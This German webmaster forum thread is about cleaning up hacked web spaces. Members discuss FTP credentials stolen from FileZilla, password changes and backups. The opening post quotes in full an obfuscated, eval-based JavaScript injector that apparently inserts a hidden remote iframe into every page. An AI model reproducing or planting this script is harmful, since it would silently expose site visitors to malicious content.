Was ist neu?
By:
Erweiterte Suche…
Digital Marketing & Webmaster Forum

Digital Marketing, Internet-Technologien, Metaverse und mehr interessieren Dich? Registriere Dich gleich kostenlos, um Mitglied zu werden! Sobald Du angemeldet bist, kannst Du loslegen, Themen und Beiträge veröffentlichen und mit anderen Mitgliedern in Kontakt treten! Wir wünschen Dir einen anregenden Austausch!

help!..hacker am space?

M

MisterAustria

- Premium Member -
hello, habe heute auf meinem space in html seiten folgendes gefunden..

Code: 
<!--2b8c75--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,166,173,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,166,173,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,167,147,154,163,152,170,62,150,151,63,62,130,151,161,164,163,166,145,166,175,115,170,151,161,167,63,147,162,170,62,164,154,164,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,166,173,152,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,166,173,152,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,166,173,152,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,166,173,152,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,166,173,152,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));</script><!--/2b8c75-->

jemand ne ahnung was das ding macht bzw wie das reinkommt??? auch htaccess wurde verändert. es betrifft 3 getrennte space bei mir. auf 2 ist keine DB und auf einem ist ausser html auch piwik installiert..
jemand ne idee wie ich das wieder los werde? und wie können 3 space gleichzeitig betroffen sein?
so weit ich sehe setzt es nicht nur dieses script in jede html sondern entfernt auch sämtliche <frame inhalte..

hab mal ftp PW geändert und mach nen virenscan aufn pc. mal sehn ob das was bringt...
könnte vielleicht mit filezilla upload zusammenhängen das da einer an die daten kam... hmmm
jedenfalls auf nem space wo nur html seiten liegen kann keiner rein ohne ftp login so weit ich weis..

MA
 
  • Like
Reactions: Kai
M

mannymanny

- Premium Member -
hatte ich jetzt auch auf einem webspace. die sind grad extrem aktiv...

der code wurde in alle .html und index.php eingefügt. auch die .htaccess wurde immer verändert.
nach dem ändern der passwörter alles vom webspace löschen und backup zurückspielen.

mit filezilla hängt das nicht zusammen. der hat das per FTP gemacht.
ob er dein FTP passwort irgendwo her hatte oder per bruteforce weiß man natürlich nicht. könnte aber auch eine lücke beim hoster sein.
bei mir zumindest fanden sich im log viele loginversuche.
 
M

MisterAustria

- Premium Member -
tja jetzt hab ich jedenfalls mal passwort geändert..
am nachmittag ist mir das aufgefallen.. daraufhin habe ich betreffende seiten gelöscht und neu hochgeladen + alles kontrolliert ob noch wo was verändert ist.. keine 3std später hatte ich das selbe wieder und überall der müllcode drin.
heute hab ich keinen bock mehr.. ich lösch mal über nacht alle seiten die sind ja eh nicht so wichtig und lad morgen wieder alles hoch... wenn dann trotz geänderten passwort wieder was kommt hak ich mal beim hoster nach weil dann weiss ich nichtmehr wo ich ansetzen soll...

MA
 
M

mannymanny

- Premium Member -
auf jeden fall gleich beim hoster melden.
der kann schon mal schauen ob fehlerhafte loginversuche waren.
wenn du das PW geändert hast, sollte ja eig. schluss ein
 
A

Adultus

- Premium Member -
Vermutlich eine "iframe injection" - google mal danach ist ein bekanntes Problem gerade mit Filezilla.
Solltest natürlich auch alle Datenbank Passwörter ändern.
Ps. Mannymanny wie kommst du darauf das es nicht an Filezilla liegen könnte? Damit gab es schon öfters Probleme soweit ich weiß.
Wenn du alle Ftp logins unter Filezilla gespeichert hast könnte es durchaus sein das da der Hund begraben ist. Viel Erfolg beim lösen des Problems.
 
mesh

mesh

- Premium Member -
Zitat von MisterAustria:
wenn dann trotz geänderten passwort wieder was kommt hak ich mal beim hoster nach weil dann weiss ich nichtmehr wo ich ansetzen soll...
Click to expand...
Wenn Du einen Wimmelhoster hast würde ich mal in Erwägung ziehen, daß die Ursache nicht in Deinem Webspace liegt.
 
M

mannymanny

- Premium Member -
Zitat von Adultus:
Vermutlich eine "iframe injection" - google mal danach ist ein bekanntes Problem gerade mit Filezilla.
Solltest natürlich auch alle Datenbank Passwörter ändern.
Ps. Mannymanny wie kommst du darauf das es nicht an Filezilla liegen könnte? Damit gab es schon öfters Probleme soweit ich weiß.
Wenn du alle Ftp logins unter Filezilla gespeichert hast könnte es durchaus sein das da der Hund begraben ist. Viel Erfolg beim lösen des Problems.
Click to expand...


du hast recht. vor allem weil gleich 3 seiten betroffen sind.
dann bedeutet das aber dass auf seinen PC irgendwie eingebrochen wurde.
 
M

MisterAustria

- Premium Member -
hm so weit wieder alles in butter. tür scheint mal zu zu sein.
piwik hab ich vorsichtshalber auch neu installiert.
das einzige was auffliel.. piwik hat über nacht scheinbar selber ne htaccess im config ordner angelegt deren funktion sich mir nicht ganz erschliesst..

Code: 
<Files "*">
<IfModule mod_access.c>
Deny from all
</IfModule>
<IfModule !mod_access_compat>
<IfModule mod_authz_host.c>
Deny from all
</IfModule>
</IfModule>
<IfModule mod_access_compat>
Deny from all
</IfModule>
</Files>

PS. jo das mitn pc kann sein.. hab aktuell nur essencials laufn.. das scheint wohl nicht alles aufzuhalten..
MA
 
AroPHO

AroPHO

- Premium Member -
Zitat von Adultus:
Wenn du alle Ftp logins unter Filezilla gespeichert hast könnte es durchaus sein das da der Hund begraben ist.
Click to expand...

Darauf würde ich auch tippen. Habe auch mal den FileZilla getestet und hatte danach 2 Wochen Spass - ich würde mir schnellstens ein anderes FTP Programm besorgen (Total Commander FTW).

Wenn hauptsächlich Deine Wordpress Installationen betroffen sind (so war es bei mir) hilft folgendes Plugin die Sauerei wieder zu bereinigen: WordPress &#8250; Exploit Scanner &laquo; WordPress Plugins

Hoffe Du erwischt alle ;)
 
M

MisterAustria

- Premium Member -
hm wo genau liegt da das problem bei filezilla.. sind das im verlauf gespeicherte logindaten welche durch ein aufn pc geschleustes schadprogramm abgegriffen werden oder hat das damit nichts zu tun sondern liegt es an der verbindung selber wenn man was hochläd?

MA
 
M

mannymanny

- Premium Member -
das problem ist nur bedingt der filezilla.
er speichert halt die daten unverschlüsselt auf deinem rechner. einige schadprogramme haben sich nun darauf spezialisiert diese daten auszulesen.

an der verbindung liegt es nicht. das macht der filezilla so wie alle anderen ftp-tools.
 
M

MisterAustria

- Premium Member -
dann dürfte das ein schadprogramm gewesen sein.. hab wieder kaspersky rauf und da wurde auch gleich einiges gelöscht..
mag dieses ding zwar nicht weil kaspersky jede menge webseiten als schädlich/bedrohung sperrt wo es tatsächlich garkein problem gibt aber naja..

MA
 
M

mannymanny

- Premium Member -
ich habe die free antivir oben.
haben noch mal alles scannen lassen. er hat bei mir nichts gefunden. wäre schon gut wenn man was eindeutiges finden würde, dann wüsste man wenigstens an was es gelegen hat.
 
You must log in or register to reply here.
Oben